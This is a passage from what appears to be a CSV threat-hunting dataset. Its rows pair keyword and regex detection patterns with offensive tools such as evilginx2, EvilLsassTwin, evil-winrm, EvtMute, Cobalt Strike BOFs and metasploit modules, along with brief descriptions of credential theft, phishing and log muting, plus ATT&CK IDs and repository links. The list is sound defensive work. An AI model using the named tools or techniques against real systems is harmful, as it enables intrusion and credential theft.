along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","10","5","449","214","2023-12-12T08:00:52Z","2020-05-13T05:58:43Z" "*evilginx-linux*",".{0,1000}evilginx\-linux.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - 
Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*evilginx-mastery*",".{0,1000}evilginx\-mastery.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*evilgophish*",".{0,1000}evilgophish.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*evilgrade*",".{0,1000}evilgrade.{0,1000}","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002 - ","N/A","N/A","Frameworks","https://github.com/infobyte/evilgrade","1","0","N/A","10","10","1254","275","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z" "*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilLsassTwin.exe*",".{0,1000}EvilLsassTwin\.exe.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilLsassTwin.nim*",".{0,1000}EvilLsassTwin\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*evilmog/ntlmv1-multi*",".{0,1000}evilmog\/ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*EvilnoVNC by @JoelGMSec*",".{0,1000}EvilnoVNC\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*EvilnoVNC Server*",".{0,1000}EvilnoVNC\sServer.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*EvilnoVNC-main*",".{0,1000}EvilnoVNC\-main.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*EvilnoVNC-main*",".{0,1000}EvilnoVNC\-main.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*eviloffice.exe *",".{0,1000}eviloffice\.exe\s.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" 
"*eviloffice.exe*",".{0,1000}eviloffice\.exe.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*EvilPayload.ps1*",".{0,1000}EvilPayload\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*evil-proxy.gemspec*",".{0,1000}evil\-proxy\.gemspec.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy/agentproxy*",".{0,1000}evil\-proxy\/agentproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy/httpproxy*",".{0,1000}evil\-proxy\/httpproxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" 
"*evil-proxy/selenium*",".{0,1000}evil\-proxy\/selenium.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy/version*",".{0,1000}evil\-proxy\/version.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*EvilProxy::HTTPProxyServer*",".{0,1000}EvilProxy\:\:HTTPProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*EvilProxy::MITMProxyServer*",".{0,1000}EvilProxy\:\:MITMProxyServer.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy-0.1.0*",".{0,1000}evil\-proxy\-0\.1\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy-0.2.0*",".{0,1000}evil\-proxy\-0\.2\.0.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - 
TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evil-proxy-master*",".{0,1000}evil\-proxy\-master.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*evilqr-main*",".{0,1000}evilqr\-main.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-phishing*",".{0,1000}evilqr\-phishing.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-server*",".{0,1000}evilqr\-server.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilrdp.exe*",".{0,1000}evilrdp\.exe.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*evilrdp-main*",".{0,1000}evilrdp\-main.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*EvilSln-main*",".{0,1000}EvilSln\-main.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*evilsocket*",".{0,1000}evilsocket.{0,1000}","offensive_tool_keyword","Github Username","github username of hacker known for sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/evilsocket","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*evilsocket/legba*",".{0,1000}evilsocket\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*eviltree_x64.exe*",".{0,1000}eviltree_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - 
T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*EvilTwin.bin*",".{0,1000}EvilTwin\.bin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwin.dmp*",".{0,1000}EvilTwin\.dmp.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" 
"*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*EvilTwinServer.nim*",".{0,1000}EvilTwinServer\.nim.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*evil-winrm -*",".{0,1000}evil\-winrm\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*evil-winrm*",".{0,1000}evil\-winrm.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. 
So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.dll*",".{0,1000}EvtMuteHook\.dll.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.iobj*",".{0,1000}EvtMuteHook\.iobj.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" 
"*EvtMuteHook.ipdb*",".{0,1000}EvtMuteHook\.ipdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.pdb*",".{0,1000}EvtMuteHook\.pdb.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.sln*",".{0,1000}EvtMuteHook\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMute-master*",".{0,1000}EvtMute\-master.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EVUAC *.exe*",".{0,1000}EVUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","0","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*ewby/Mockingjay_BOF*",".{0,1000}ewby\/Mockingjay_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","143","16","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z" "*ewok -t *",".{0,1000}ewok\s\-t\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","1","44","18","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z" "*example-bof.sln*",".{0,1000}example\-bof\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual 
Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*examples/netview.py*",".{0,1000}examples\/netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Excel-Exploit.git*",".{0,1000}Excel\-Exploit\.git.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*Excel-Exploit-main*",".{0,1000}Excel\-Exploit\-main.{0,1000}","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","20","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*ExcelReflectImplant*",".{0,1000}ExcelReflectImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*excelshellinject.*",".{0,1000}excelshellinject\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*exchange_proxylogon_rce.*",".{0,1000}exchange_proxylogon_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
